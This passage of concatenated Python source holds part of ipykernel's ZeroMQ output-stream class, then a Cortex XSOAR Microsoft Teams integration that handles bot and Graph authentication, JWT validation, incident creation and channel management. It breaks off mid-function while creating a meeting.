    """A file like object that publishes the stream to a 0MQ PUB socket.
    Output is handed off to an IO Thread
    """
    # The time interval between automatic flushes, in seconds.
    flush_interval = 0.2
    topic = None
    encoding = 'UTF-8'
    def __init__(self, session, pub_thread, name, pipe=None):
        if pipe is not None:
            warnings.warn("pipe argument to OutStream is deprecated and ignored",
                DeprecationWarning)
        # This is necessary for compatibility with Python built-in streams
        self.session = session
        if not isinstance(pub_thread, IOPubThread):
            # Backward-compat: given socket, not thread. Wrap in a thread.
            warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
                DeprecationWarning, stacklevel=2)
            pub_thread = IOPubThread(pub_thread)
            pub_thread.start()
        self.pub_thread = pub_thread
        # 'stdout' or 'stderr'; also embedded in the zmq topic below.
        self.name = name
        self.topic = b'stream.' + py3compat.cast_bytes(name)
        self.parent_header = {}
        # Remember the creating pid so forked children can be detected.
        self._master_pid = os.getpid()
        # True while an automatic flush is already scheduled in the IO loop.
        self._flush_pending = False
        self._io_loop = pub_thread.io_loop
        self._new_buffer()
    def _is_master_process(self):
        return os.getpid() == self._master_pid
    def set_parent(self, parent):
        # Associate subsequent output with the given parent message header.
        self.parent_header = extract_header(parent)
    def close(self):
        self.pub_thread = None
    @property
    def closed(self):
        return self.pub_thread is None
    def _schedule_flush(self):
        """schedule a flush in the IO thread
        call this on write, to indicate that flush should be called soon.
        """
        if self._flush_pending:
            return
        self._flush_pending = True
        # add_timeout has to be handed to the io thread via event pipe
        def _schedule_in_thread():
            self._io_loop.call_later(self.flush_interval, self._flush)
        self.pub_thread.schedule(_schedule_in_thread)
    def flush(self):
        """trigger actual zmq send
        send will happen in the background thread
        """
        if self.pub_thread.thread.is_alive():
            # wait for flush to actually get through:
            self.pub_thread.schedule(self._flush)
            # The event fires after _flush since the IO thread processes
            # scheduled callbacks in order.
            evt = threading.Event()
            self.pub_thread.schedule(evt.set)
            evt.wait()
        else:
            self._flush()
    def _flush(self):
        """This is where the actual send happens.
        _flush should generally be called in the IO thread,
        unless the thread has been destroyed (e.g. forked subprocess).
        """
        self._flush_pending = False
        data = self._flush_buffer()
        if data:
            # FIXME: this disables Session's fork-safe check,
            # since pub_thread is itself fork-safe.
            # There should be a better way to do this.
            self.session.pid = os.getpid()
            content = {u'name':self.name, u'text':data}
            self.session.send(self.pub_thread, u'stream', content=content,
                parent=self.parent_header, ident=self.topic)
    def write(self, string):
        if self.pub_thread is None:
            raise ValueError('I/O operation on closed file')
        else:
            # Make sure that we're handling unicode
            if not isinstance(string, unicode_type):
                string = string.decode(self.encoding, 'replace')
            is_child = (not self._is_master_process())
            # only touch the buffer in the IO thread to avoid races
            self.pub_thread.schedule(lambda : self._buffer.write(string))
            if is_child:
                # newlines imply flush in subprocesses
                # mp.Pool cannot be trusted to flush promptly (or ever),
                # and this helps.
                if '\n' in string:
                    self.flush()
            else:
                self._schedule_flush()
    def writelines(self, sequence):
        if self.pub_thread is None:
            raise ValueError('I/O operation on closed file')
        else:
            for string in sequence:
                self.write(string)
    def _flush_buffer(self):
        """clear the current buffer and return the current buffer data.
        This should only be called in the IO thread.
        """
        data = u''
        if self._buffer is not None:
            buf = self._buffer
            # Swap in a fresh buffer before reading so concurrent writes go
            # to the new one.
            self._new_buffer()
            data = buf.getvalue()
            buf.close()
        return data
    def _new_buffer(self):
        self._buffer = StringIO()
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
# Integration instance parameters configured in XSOAR.
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
# SSL verification is enabled unless the 'insecure' checkbox was set.
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
# Matches plain URLs so they can be turned into markdown links.
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
# Matches a GUID, optionally wrapped in braces (entitlement ids).
ENTITLEMENT_REGEX: str = \
    r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
# Matches @mentions terminated by ';' at the start of or within a message.
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
# Notification message type names used when posting to Teams.
MESSAGE_TYPES: dict = {
    'mirror_entry': 'mirrorEntry',
    'incident_opened': 'incidentOpened',
    'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
    """
    Return the number of seconds for given date. If no date, return current.
    :param d: timestamp datetime object
    :return: timestamp in epoch
    """
    when = datetime.utcnow() if not d else d
    elapsed = when - datetime.utcfromtimestamp(0)
    return int(elapsed.total_seconds())
def error_parser(resp_err: 'requests.Response', api: str = 'graph') -> str:
    """
    Parses Microsoft API error message from Requests response
    :param resp_err: response with error
    :param api: API to query (graph/bot)
    :return: string of error
    """
    try:
        response: dict = resp_err.json()
        if api == 'graph':
            error: dict = response.get('error', {})
            code: str = error.get('code', '')
            message: str = error.get('message', '')
            # Only report the structured error when it carries content.
            # The original tested the joined f-string, which always contains
            # ': ' and is therefore always truthy, making the raw-text
            # fallback below unreachable for graph responses.
            if code or message:
                return f'{code}: {message}'
        elif api == 'bot':
            error_description: str = response.get('error_description', '')
            if error_description:
                return error_description
        # If no error message
        raise ValueError()
    except ValueError:
        # Invalid JSON body or no structured error: fall back to raw text.
        return resp_err.text
def translate_severity(severity: str) -> int:
    """
    Translates Demisto text severity to int severity
    :param severity: Demisto text severity
    :return: Demisto integer severity
    """
    levels = ('Unknown', 'Low', 'Medium', 'High', 'Critical')
    mapping = {name: value for value, name in enumerate(levels)}
    # Unrecognized severities map to 0 (Unknown).
    return mapping.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
    """
    Creates incidents according to a provided JSON object
    :param demisto_user: The demisto user associated with the request (if exists)
    :param incidents: The incidents JSON
    :return: The creation result
    """
    if not demisto_user:
        return demisto.createIncidents(incidents)
    # Attribute the creation to the requesting user when one is known.
    return demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
def process_incident_create_message(demisto_user: dict, message: str) -> str:
    """
    Processes an incident creation message
    :param demisto_user: The Demisto user associated with the message (if exists)
    :param message: The creation message
    :return: Creation result
    """
    # Lookbehind patterns capture everything after each `key=` token.
    json_pattern: str = r'(?<=json=).*'
    name_pattern: str = r'(?<=name=).*'
    type_pattern: str = r'(?<=type=).*'
    json_match: Optional[Match[str]] = re.search(json_pattern, message)
    created_incident: Union[dict, list]
    data: str = str()
    if json_match:
        # json= is exclusive: reject a message that mixes it with name=/type=.
        if re.search(name_pattern, message) or re.search(type_pattern, message):
            data = 'No other properties other than json should be specified.'
        else:
            incidents_json: str = json_match.group()
            # Normalize "smart quotes" that chat clients substitute so the
            # payload parses as valid JSON.
            incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
            if not isinstance(incidents, list):
                incidents = [incidents]
            created_incident = create_incidents(demisto_user, incidents)
            if not created_incident:
                data = 'Failed creating incidents.'
    else:
        name_match: Optional[Match[str]] = re.search(name_pattern, message)
        if not name_match:
            data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
        else:
            # name= and type= may appear in either order; strip the other
            # key's text from each captured value.
            incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
            incident_type: str = str()
            type_match: Optional[Match[str]] = re.search(type_pattern, message)
            if type_match:
                incident_type = re.sub('name=.*', '', type_match.group()).strip()
            incident: dict = {'name': incident_name}
            # Fall back to the integration's configured default incident type.
            incident_type = incident_type or INCIDENT_TYPE
            if incident_type:
                incident['type'] = incident_type
            created_incident = create_incidents(demisto_user, [incident])
            if not created_incident:
                data = 'Failed creating incidents.'
    if created_incident:
        # Normalize to a single incident dict and build a link to its War Room.
        if isinstance(created_incident, list):
            created_incident = created_incident[0]
        created_incident = cast(Dict[Any, Any], created_incident)
        server_links: dict = demisto.demistoUrls()
        server_link: str = server_links.get('server', '')
        data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
               f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
    return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
    """
    Checks if investigation is already mirrored
    :param investigation_id: Investigation ID to check if mirrored
    :param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
    :return: Index in mirrored channels list if mirrored, else -1
    """
    matches = (
        position
        for position, channel in enumerate(mirrored_channels)
        if channel.get('investigation_id') == investigation_id
    )
    # First matching index, or -1 when the investigation is not mirrored.
    return next(matches, -1)
def urlify_hyperlinks(message: str) -> str:
    """
    Turns URL to markdown hyper-link
    e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
    :param message: Message to look for URLs in
    :return: Formatted message with hyper-links
    """
    formatted_message: str = message
    for url in re.findall(URL_REGEX, message):
        markdown_link = f'[{url}]({url})'
        formatted_message = formatted_message.replace(url, markdown_link)
    return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
    """
    Searches for a team member
    :param integration_context: Cached object to search for team member in
    :param team_member_id: Team member ID to search for
    :return: Found team member object
    """
    cached_teams: list = json.loads(integration_context.get('teams', '[]'))
    for team in cached_teams:
        for member in team.get('team_members', []):
            if member.get('id') == team_member_id:
                return {
                    'username': member.get('name', ''),
                    'user_email': member.get('userPrincipalName', ''),
                }
    raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
    """
    Gets team member ID based on name, email or principal name
    :param requested_team_member: Team member name / principal name / email to look for
    :param integration_context: Cached object to search for team member in
    :return: Team member ID
    """
    cached_teams: list = json.loads(integration_context.get('teams', '[]'))
    for team in cached_teams:
        for member in team.get('team_members', []):
            known_names = {member.get('name', ''), member.get('userPrincipalName', '')}
            if requested_team_member in known_names:
                return member.get('id')
    raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
    """
    Creates Microsoft Teams adaptive card object given body and actions
    :param body: Adaptive card data
    :param actions: Adaptive card actions
    :return: Adaptive card object
    """
    content: dict = {
        '$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
        'version': '1.0',
        'type': 'AdaptiveCard',
        'body': body
    }
    if actions:
        content['actions'] = actions
    return {
        'contentType': 'application/vnd.microsoft.card.adaptive',
        'content': content
    }
def process_tasks_list(data_by_line: list) -> dict:
    """
    Processes tasks list assigned to user given from Demisto server and creates adaptive card
    :param data_by_line: List of tasks to process
    :return: Adaptive card of assigned tasks
    """
    titles = ('Task:', 'Incident:', 'Due:')
    body: list = []
    # First two lines are the markdown table header and separator - skip them
    for line in data_by_line[2:]:
        columns = [column.strip() for column in line.split('|')]
        facts = [{'title': title, 'value': value} for title, value in zip(titles, columns)]
        # Fourth column is a URL - render it as a markdown link
        facts.append({'title': 'Link:', 'value': f'[{columns[3]}]({columns[3]})'})
        body.append({'type': 'FactSet', 'facts': facts})
    return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
    """
    Processes incidents list assigned to user given from Demisto server and creates adaptive card
    :param data_by_line: List of incidents to process
    :return: Adaptive card of assigned incidents
    """
    titles = ('ID:', 'Name:', 'Status:', 'Type:', 'Owner:', 'Created:')
    body: list = []
    # First two lines are the markdown table header and separator - skip them
    for line in data_by_line[2:]:
        columns = [column.strip() for column in line.split('|')]
        facts = [{'title': title, 'value': value} for title, value in zip(titles, columns)]
        # Seventh column is a URL - render it as a markdown link
        facts.append({'title': 'Link:', 'value': f'[{columns[6]}]({columns[6]})'})
        body.append({'type': 'FactSet', 'facts': facts})
    return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
    """
    Processes mirror investigation command or unknown direct message and creates adaptive card
    :param message: The direct message to process
    :return: Adaptive card of mirror response / unknown message
    """
    # Double newlines so line breaks survive adaptive-card markdown rendering
    text_block: dict = {
        'type': 'TextBlock',
        'text': message.replace('\n', '\n\n'),
        'wrap': True
    }
    return create_adaptive_card([text_block])
def process_ask_user(message: str) -> dict:
    """
    Processes ask user message and creates adaptive card
    :param message: The question object (JSON string)
    :return: Adaptive card of the question to send
    """
    question: dict = json.loads(message)
    body = [
        {
            'type': 'TextBlock',
            'text': question.get('message_text', '')
        }
    ]
    # Entitlement/investigation/task identifiers ride along with every answer
    # so the server can resolve the TeamsAsk entitlement on submit
    common_data: dict = {
        'entitlement': question.get('entitlement', ''),
        'investigation_id': question.get('investigation_id', ''),
        'task_id': question.get('task_id', '')
    }
    actions: list = [
        {
            'type': 'Action.Submit',
            'title': option,
            'data': {'response': option, **common_data}
        }
        for option in question.get('options', [])
    ]
    return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
    """
    Retrieves Bot Framework API access token, either from cache or from Microsoft
    :return: The Bot Framework API access token
    :raises ValueError: If the token endpoint returns an error or a non-JSON body
    """
    integration_context: dict = get_integration_context()
    access_token: str = integration_context.get('bot_access_token', '')
    # Default must be 0, not the `int` type object: `int` is always truthy and
    # comparing `epoch_seconds() < int` raises TypeError when a token is cached
    # without an expiry timestamp.
    valid_until: int = integration_context.get('bot_valid_until', 0)
    if access_token and valid_until:
        if epoch_seconds() < valid_until:
            # Cached token is still valid - reuse it
            return access_token
    url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
    data: dict = {
        'grant_type': 'client_credentials',
        'client_id': BOT_ID,
        'client_secret': BOT_PASSWORD,
        'scope': 'https://api.botframework.com/.default'
    }
    response: requests.Response = requests.post(
        url,
        data=data,
        verify=USE_SSL
    )
    if not response.ok:
        error = error_parser(response, 'bot')
        raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
    try:
        response_json: dict = response.json()
        access_token = response_json.get('access_token', '')
        expires_in: int = response_json.get('expires_in', 3595)
        time_now: int = epoch_seconds()
        time_buffer = 5  # seconds by which to shorten the validity period
        if expires_in - time_buffer > 0:
            # Err on the side of an earlier expiry so we never send a token
            # that dies mid-request
            expires_in -= time_buffer
        integration_context['bot_access_token'] = access_token
        integration_context['bot_valid_until'] = time_now + expires_in
        set_integration_context(integration_context)
        return access_token
    except ValueError:
        raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
    """
    Retrieves Microsoft Graph API access token, either from cache or from Microsoft
    :return: The Microsoft Graph API access token
    :raises ValueError: If the tenant ID is unknown, or the token endpoint
        returns an error or a non-JSON body
    """
    integration_context: dict = get_integration_context()
    access_token: str = integration_context.get('graph_access_token', '')
    # Default must be 0, not the `int` type object: `int` is always truthy and
    # comparing `epoch_seconds() < int` raises TypeError when a token is cached
    # without an expiry timestamp.
    valid_until: int = integration_context.get('graph_valid_until', 0)
    if access_token and valid_until:
        if epoch_seconds() < valid_until:
            # Cached token is still valid - reuse it
            return access_token
    # Tenant ID is learned from incoming bot activities; without it we cannot
    # build the tenant-specific token endpoint URL
    tenant_id: str = integration_context.get('tenant_id', '')
    if not tenant_id:
        raise ValueError(
            'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
            'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
        )
    url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
    data: dict = {
        'grant_type': 'client_credentials',
        'client_id': BOT_ID,
        'scope': 'https://graph.microsoft.com/.default',
        'client_secret': BOT_PASSWORD
    }
    response: requests.Response = requests.post(
        url,
        data=data,
        verify=USE_SSL
    )
    if not response.ok:
        error = error_parser(response)
        raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
    try:
        response_json: dict = response.json()
        access_token = response_json.get('access_token', '')
        expires_in: int = response_json.get('expires_in', 3595)
        time_now: int = epoch_seconds()
        time_buffer = 5  # seconds by which to shorten the validity period
        if expires_in - time_buffer > 0:
            # Err on the side of an earlier expiry so we never send a token
            # that dies mid-request
            expires_in -= time_buffer
        integration_context['graph_access_token'] = access_token
        integration_context['graph_valid_until'] = time_now + expires_in
        set_integration_context(integration_context)
        return access_token
    except ValueError:
        raise ValueError('Failed to get Graph access token')
def http_request(
        method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
    """A wrapper for requests lib to send our requests and handle requests and responses better
    Headers to be sent in requests
    Args:
        method (str): any restful method
        url (str): URL to query
        json_ (dict): HTTP JSON body
        api (str): API to query (graph/bot)
        params (dict): Object of key-value URL query parameters
    Returns:
        Union[dict, list]: The response in list or dict format.
    Raises:
        ValueError: If the API responded with a non-OK status, or with a body
            that is not valid JSON.
        ConnectionError: On connect-timeout, SSL-verification or proxy failures.
    """
    # Pick the bearer token for the target API (Microsoft Graph vs Bot Framework)
    if api == 'graph':
        access_token = get_graph_access_token()
    else:  # Bot Framework API
        access_token = get_bot_access_token()
    headers: dict = {
        'Authorization': f'Bearer {access_token}',
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    try:
        response: requests.Response = requests.request(
            method,
            url,
            headers=headers,
            json=json_,
            verify=USE_SSL,
            params=params,
        )
        if not response.ok:
            error: str = error_parser(response, api)
            raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
        if response.status_code in {202, 204}:
            # Delete channel or remove user from channel return 204 if successful
            # Update message returns 202 if the request has been accepted for processing
            return {}
        if response.status_code == 201:
            # For channel creation query, we get a body in the response, otherwise we should just return
            if not response.content:
                return {}
        # Any remaining success response (200, or 201 with a body) is parsed as JSON
        try:
            return response.json()
        except ValueError:
            raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
    except requests.exceptions.ConnectTimeout:
        error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
                        'accessible from your host.'
        raise ConnectionError(error_message)
    except requests.exceptions.SSLError:
        error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
                        'the integration configuration.'
        raise ConnectionError(error_message)
    except requests.exceptions.ProxyError:
        error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
                        'selected, try deselecting it.'
        raise ConnectionError(error_message)
def integration_health():
    """
    Reports Bot Framework / Graph API health and the currently mirrored
    channels as a war-room entry.
    """
    # A successful token fetch means the API is reachable and credentials work;
    # evaluation order (bot first, then graph) matches the output columns
    try:
        get_bot_access_token()
        bot_framework_api_health = 'Operational'
    except ValueError as e:
        bot_framework_api_health = f'Non operational - {str(e)}'
    try:
        get_graph_access_token()
        graph_api_health = 'Operational'
    except ValueError as e:
        graph_api_health = f'Non operational - {str(e)}'
    api_health_output: list = [{
        'Bot Framework API Health': bot_framework_api_health,
        'Graph API Health': graph_api_health
    }]
    adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
    integration_context: dict = get_integration_context()
    # Flatten the cached team/channel hierarchy into one row per mirrored channel
    mirrored_channels_output = [
        {
            'Team': team.get('team_name'),
            'Channel': channel.get('channel_name'),
            'Investigation ID': channel.get('investigation_id')
        }
        for team in json.loads(integration_context.get('teams', '[]'))
        for channel in team.get('mirrored_channels', [])
    ]
    if mirrored_channels_output:
        mirrored_channels_human_readable = tableToMarkdown(
            'Microsoft Teams Mirrored Channels', mirrored_channels_output
        )
    else:
        mirrored_channels_human_readable = 'No mirrored channels.'
    combined = adi_health_human_readable + mirrored_channels_human_readable
    demisto.results({
        'ContentsFormat': formats['json'],
        'Type': entryTypes['note'],
        'HumanReadable': combined,
        'Contents': combined
    })
def validate_auth_header(headers: dict) -> bool:
    """
    Validated authorization header provided in the bot activity object
    Verifies the Bearer JWT: issuer, signature against the Bot Framework JWKS
    (cached, refetched on cache miss), msteams endorsement and audience claim.
    :param headers: Bot activity headers
    :return: True if authorized, else False
    """
    parts: list = headers.get('Authorization', '').split(' ')
    if len(parts) != 2:
        return False
    schema: str = parts[0]
    jwt_token: str = parts[1]
    if schema != 'Bearer' or not jwt_token:
        demisto.info('Authorization header validation - failed to verify schema')
        return False
    # Decode WITHOUT verification first, only to read the issuer claim
    decoded_payload: dict = jwt.decode(jwt_token, verify=False)
    issuer: str = decoded_payload.get('iss', '')
    if issuer != 'https://api.botframework.com':
        demisto.info('Authorization header validation - failed to verify issuer')
        return False
    integration_context: dict = get_integration_context()
    open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
    keys: list = open_id_metadata.get('keys', [])
    unverified_headers: dict = jwt.get_unverified_header(jwt_token)
    key_id: str = unverified_headers.get('kid', '')
    key_object: dict = dict()
    # Check if we got the requested key in cache
    for key in keys:
        if key.get('kid') == key_id:
            key_object = key
            break
    if not key_object:
        # Didn't find requested key in cache, getting new keys
        try:
            open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
            response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
            if not response.ok:
                demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
                return False
            response_json: dict = response.json()
            jwks_uri: str = response_json.get('jwks_uri', '')
            keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
            if not keys_response.ok:
                # Fix: log the failing JWKS response's reason (was `response.reason`,
                # i.e. the already-successful open ID config response)
                demisto.info(f'Authorization header validation failed to fetch keys - {keys_response.reason}')
                return False
            keys_response_json: dict = keys_response.json()
            keys = keys_response_json.get('keys', [])
            open_id_metadata['keys'] = keys
        except ValueError:
            demisto.info('Authorization header validation - failed to parse keys response')
            return False
    if not keys:
        # Didn't get new keys
        demisto.info('Authorization header validation - failed to get keys')
        return False
    # Find requested key in new keys
    for key in keys:
        if key.get('kid') == key_id:
            key_object = key
            break
    if not key_object:
        # Didn't find requested key in new keys
        demisto.info('Authorization header validation - failed to find relevant key')
        return False
    endorsements: list = key_object.get('endorsements', [])
    if not endorsements or 'msteams' not in endorsements:
        demisto.info('Authorization header validation - failed to verify endorsements')
        return False
    # Second decode verifies the signature with the matched JWK's public key;
    # audience is checked manually below, expiry is enforced here
    public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
    options = {
        'verify_aud': False,
        'verify_exp': True
    }
    decoded_payload = jwt.decode(jwt_token, public_key, options=options)
    audience_claim: str = decoded_payload.get('aud', '')
    if audience_claim != demisto.params().get('bot_id'):
        demisto.info('Authorization header validation - failed to verify audience_claim')
        return False
    # Persist the (possibly refreshed) JWKS cache
    integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
    set_integration_context(integration_context)
    return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
    """
    Gets Team AAD ID
    :param team_name: Team name to get AAD ID of
    :return: team AAD ID
    :raises ValueError: If the team is not found in cache nor via the Graph API
    """
    # Prefer the cached team list to avoid an extra Graph API round trip
    integration_context: dict = get_integration_context()
    cached_teams = integration_context.get('teams')
    if cached_teams:
        for team in json.loads(cached_teams):
            if team.get('team_name', '') == team_name:
                return team.get('team_aad_id', '')
    # Cache miss - query Graph for all groups provisioned as Teams
    url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
    response: dict = cast(Dict[Any, Any], http_request('GET', url))
    for team in response.get('value', []):
        if team.get('displayName', '') == team_name:
            return team.get('id', '')
    raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
    """Retrieves the AAD ID of requested user
    Args:
        user (str): Display name/mail/UPN of user to get ID of.
    Return:
        list: List containing the requested user object
    """
    # Match the user on any of display name, mail or user principal name,
    # selecting only the id field
    filter_query = f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'"
    users = cast(Dict[Any, Any], http_request(
        'GET',
        f'{GRAPH_BASE_URL}/v1.0/users',
        params={'$filter': filter_query, '$select': 'id'}
    ))
    return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
    """
    Request for adding user to channel
    :param team_aad_id: AAD ID of the team owning the channel
    :param channel_id: ID of the channel to add the user to
    :param user_id: AAD ID of the user to add
    """
    payload: dict = {
        '@odata.type': '#microsoft.graph.aadUserConversationMember',
        'roles': [],
        'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}'  # disable-secrets-detection
    }
    members_url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
    http_request('POST', members_url, json_=payload)
def add_user_to_channel_command():
    """
    Add user to channel (private channel only as still in beta mode)
    :raises ValueError: If the requested user cannot be resolved to an AAD ID
    """
    channel_name: str = demisto.args().get('channel', '')
    team_name: str = demisto.args().get('team', '')
    member = demisto.args().get('member', '')
    matched_users: list = get_user(member)
    # get_user returns a (possibly empty) list; require a resolvable AAD ID
    if not (matched_users and matched_users[0].get('id')):
        raise ValueError(f'User {member} was not found')
    team_aad_id = get_team_aad_id(team_name)
    channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
    add_user_to_channel(team_aad_id, channel_id, matched_users[0].get('id'))
    demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
    """
    Creates a Microsoft Teams channel
    :param team_aad_id: Team AAD ID to create channel in
    :param channel_name: Name of channel to create
    :param channel_description: Description of channel to create
    :return: ID of created channel
    """
    channel_data: dict = cast(Dict[Any, Any], http_request(
        'POST',
        f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels',
        json_={
            'displayName': channel_name,
            'description': channel_description
        }
    ))
    return channel_data.get('id', '')
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
    """
    Creates a Microsoft Teams meeting
    :param user_id: The User's ID
    :param subject: The meeting's subject
    :param start_date_time: The meeting's start time
    :param end_date_time: The meeting's end time
    :return: Dict with info about the created meeting.
    """
    request_json: dict = {'subject': subject}
    # Start/end times are optional - only include them when provided
    if start_date_time:
        request_json['startDateTime'] = start_date_time
    if end_date_time:
        request_json['endDateTime'] = end_date_time
    meetings_url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
